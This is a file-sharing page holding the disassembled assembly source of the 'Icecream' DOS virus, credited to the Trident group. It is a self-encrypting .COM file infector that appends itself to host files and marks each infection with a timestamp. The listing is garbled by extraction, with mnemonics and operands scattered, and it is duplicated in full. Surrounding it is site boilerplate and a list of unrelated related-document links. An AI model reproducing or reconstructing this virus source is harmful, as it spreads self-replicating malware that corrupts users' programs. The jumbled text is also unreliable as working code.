Icecream
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Icecream as PDF for free.
More details
- Words: 598
- Pages: 5
;icecream virus by the trident virus research group. ;this is a simple direct-action com virus that uses one of ;4 encryption algorithms to encrypt itself each time it infects a file. ;it will infect one .com file in the current directory every time it is ;executed. it marks infections with the time stamp. ;disassembly by black wolf .model tiny .code
org
100h
db
0e9h,0ch,0
start: author_name
db
db virus_entry: push call get_offset: pop sub
virus_entry
'john tardy' 0e2h,0fah ax get_offset ax ax,offset get_offset
db lea mov movsw movsb
89h,0c5h si,[bp+storage] di,100h
mov mov int
ah,1ah dx,0f900h 21h
mov
ah,4eh
findfirstnext: lea xor int jnc
dx,[bp+commask] cx,cx 21h infectfile
restore_dta: mov mov int
ah,1ah dx,80h 21h
infectfile:
;jmp
mov pop push retn
bx,offset start ax bx
mov mov
ax,4300h dx,0f91eh
;mov
bp,ax ;restore file
;set dta
;find file
;set dta to default ;return to host
int
21h
;get file attribs
push mov xor int
cx ax,4301h cx,cx 21h
;save 'em
mov int
ax,3d02h 21h
;open file
mov xchg int
bx,5700h ax,bx 21h
;get file time
push push and cmp jne db
cx dx cx,1fh cx,1 continueinfection 0e9h,69h,0
continueinfection: mov lea mov int
ah,3fh dx,[bp+storage] cx,3 21h
;set them to 0
;save it ;check for infection ;jmp
doneinfect
;read in first 3 bytes
mov cmp je cmp je
ax,cs:[storage+bp] ax,4d5ah doneinfect ax,5a4dh doneinfect
pop pop and or push push
dx cx cx,0ffe0h cx,1 cx dx
mov call sub mov
ax,4202h move_fp ax,3 cs:[jumpsize+bp],ax
add mov mov mov mov call
ax,10fh ;save encryption starting word ptr [bp+encptr1+1],ax ;point.... word ptr [bp+encptr2+1],ax word ptr [bp+encptr3+1],ax word ptr [bp+encptr4+1],ax setupencryption ;encrypt virus
mov mov mov int
ah,40h dx,0fa00h cx,1f5h 21h
mov
ax,4200h
;is it an exe? ;other exe signature?
;change stored time values ;to mark infection
;go to the end of the file ;save jump size
;write virus to file
call
move_fp
;go to the beginning of file
mov lea mov int
ah,40h dx,[bp+jumpbytes] cx,3 21h
;write in jump
call jmp
finishfile restore_dta
call mov jmp
finishfile ah,4fh findfirstnext
xor xor int ret
cx,cx dx,dx 21h
pop mov int
si dx cx ax,5701h 21h
;reset file time/date stamp ;(or mark infection)
mov int
ah,3eh 21h
;close new host file
mov pop mov int
ax,4301h cx dx,0fc1eh 21h
;restore old attributes
push retn
si
doneinfect:
move_fp:
finishfile:
message
db
setupencryption: xor xor mov mov push pop push and add mov mov mov mov pop push and shl
db
' i scream, you scream, we both ' 'scream for an ice-cream! ' byte ptr [bp+10dh],2 ax,ax es,ax ax,es:[46ch] ;get random number cs es ax ax,7ffh ax,1e9h word ptr [bp+encsize1+1],ax word ptr [bp+encsize2+1],ax word ptr [bp+encsize3+1],ax word ptr [bp+encsize4+1],ax ax ax ax,3 ax,1
mov mov add mov lea movsw movsw movsw movsw pop stosb movsb mov lea mov mov rep lea mov encryptvirus: lodsb db stosb loop
si,ax ax,[bp+si+encdata1] ax,bp si,ax di,[bp+103h]
;copy encryption algorithm ax dl,al si,[bp+103h] di,0fa00h cx,0ch movsb si,[bp+10fh] cx,1e9h
30h,0d0h
cmp je retn
dl,0 keywaszero
mov mov mov rep mov add mov retn
si,offset authorname di,0fa00h cx,0ah movsb ax,cs:[jumpsize+bp] ax,0ch cs:[jumpsize+bp],ax
db
'[trident]' dw dw dw dw
al,dl
encryptvirus
keywaszero:
encdata1 encdata2 encdata3 encdata4
;xor
;if key is zero, increase ;jump size and place name ;at beginning....
02beh 02c7h 02d0h 02d9h
encryptions: ;-----------------------------------------------------------encptr1: mov si,0 encsize1: mov cx,0 xor byte ptr [si],46h ;-----------------------------------------------------------encptr2: mov di,0 encsize2:
mov cx,0 xor byte ptr [di],47h ;-----------------------------------------------------------encsize3: mov cx,0 encptr3: mov si,0 xor byte ptr [si],46h ;-----------------------------------------------------------encsize4: mov cx,0 encptr4: mov di,0 xor byte ptr [di],47h ;-----------------------------------------------------------authorname
db
'john tardy'
jumpbytes jumpsize
db dw
0e9h 0
commask
db
'*.com',0
storage end
db start
dw
21h
20cdh
org
100h
db
0e9h,0ch,0
start: author_name
db
db virus_entry: push call get_offset: pop sub
virus_entry
'john tardy' 0e2h,0fah ax get_offset ax ax,offset get_offset
db lea mov movsw movsb
89h,0c5h si,[bp+storage] di,100h
mov mov int
ah,1ah dx,0f900h 21h
mov
ah,4eh
findfirstnext: lea xor int jnc
dx,[bp+commask] cx,cx 21h infectfile
restore_dta: mov mov int
ah,1ah dx,80h 21h
infectfile:
;jmp
mov pop push retn
bx,offset start ax bx
mov mov
ax,4300h dx,0f91eh
;mov
bp,ax ;restore file
;set dta
;find file
;set dta to default ;return to host
int
21h
;get file attribs
push mov xor int
cx ax,4301h cx,cx 21h
;save 'em
mov int
ax,3d02h 21h
;open file
mov xchg int
bx,5700h ax,bx 21h
;get file time
push push and cmp jne db
cx dx cx,1fh cx,1 continueinfection 0e9h,69h,0
continueinfection: mov lea mov int
ah,3fh dx,[bp+storage] cx,3 21h
;set them to 0
;save it ;check for infection ;jmp
doneinfect
;read in first 3 bytes
mov cmp je cmp je
ax,cs:[storage+bp] ax,4d5ah doneinfect ax,5a4dh doneinfect
pop pop and or push push
dx cx cx,0ffe0h cx,1 cx dx
mov call sub mov
ax,4202h move_fp ax,3 cs:[jumpsize+bp],ax
add mov mov mov mov call
ax,10fh ;save encryption starting word ptr [bp+encptr1+1],ax ;point.... word ptr [bp+encptr2+1],ax word ptr [bp+encptr3+1],ax word ptr [bp+encptr4+1],ax setupencryption ;encrypt virus
mov mov mov int
ah,40h dx,0fa00h cx,1f5h 21h
mov
ax,4200h
;is it an exe? ;other exe signature?
;change stored time values ;to mark infection
;go to the end of the file ;save jump size
;write virus to file
call
move_fp
;go to the beginning of file
mov lea mov int
ah,40h dx,[bp+jumpbytes] cx,3 21h
;write in jump
call jmp
finishfile restore_dta
call mov jmp
finishfile ah,4fh findfirstnext
xor xor int ret
cx,cx dx,dx 21h
pop mov int
si dx cx ax,5701h 21h
;reset file time/date stamp ;(or mark infection)
mov int
ah,3eh 21h
;close new host file
mov pop mov int
ax,4301h cx dx,0fc1eh 21h
;restore old attributes
push retn
si
doneinfect:
move_fp:
finishfile:
message
db
setupencryption: xor xor mov mov push pop push and add mov mov mov mov pop push and shl
db
' i scream, you scream, we both ' 'scream for an ice-cream! ' byte ptr [bp+10dh],2 ax,ax es,ax ax,es:[46ch] ;get random number cs es ax ax,7ffh ax,1e9h word ptr [bp+encsize1+1],ax word ptr [bp+encsize2+1],ax word ptr [bp+encsize3+1],ax word ptr [bp+encsize4+1],ax ax ax ax,3 ax,1
mov mov add mov lea movsw movsw movsw movsw pop stosb movsb mov lea mov mov rep lea mov encryptvirus: lodsb db stosb loop
si,ax ax,[bp+si+encdata1] ax,bp si,ax di,[bp+103h]
;copy encryption algorithm ax dl,al si,[bp+103h] di,0fa00h cx,0ch movsb si,[bp+10fh] cx,1e9h
30h,0d0h
cmp je retn
dl,0 keywaszero
mov mov mov rep mov add mov retn
si,offset authorname di,0fa00h cx,0ah movsb ax,cs:[jumpsize+bp] ax,0ch cs:[jumpsize+bp],ax
db
'[trident]' dw dw dw dw
al,dl
encryptvirus
keywaszero:
encdata1 encdata2 encdata3 encdata4
;xor
;if key is zero, increase ;jump size and place name ;at beginning....
02beh 02c7h 02d0h 02d9h
encryptions: ;-----------------------------------------------------------encptr1: mov si,0 encsize1: mov cx,0 xor byte ptr [si],46h ;-----------------------------------------------------------encptr2: mov di,0 encsize2:
mov cx,0 xor byte ptr [di],47h ;-----------------------------------------------------------encsize3: mov cx,0 encptr3: mov si,0 xor byte ptr [si],46h ;-----------------------------------------------------------encsize4: mov cx,0 encptr4: mov di,0 xor byte ptr [di],47h ;-----------------------------------------------------------authorname
db
'john tardy'
jumpbytes jumpsize
db dw
0e9h 0
commask
db
'*.com',0
storage end
db start
dw
21h
20cdh
Related Documents
Icecream
November 2019 9
Ra20080523 Icecream
October 2019 8
Chocolate Icecream
November 2019 11
Sea Salt Icecream
June 2020 5
35 Cents For An Icecream
November 2019 14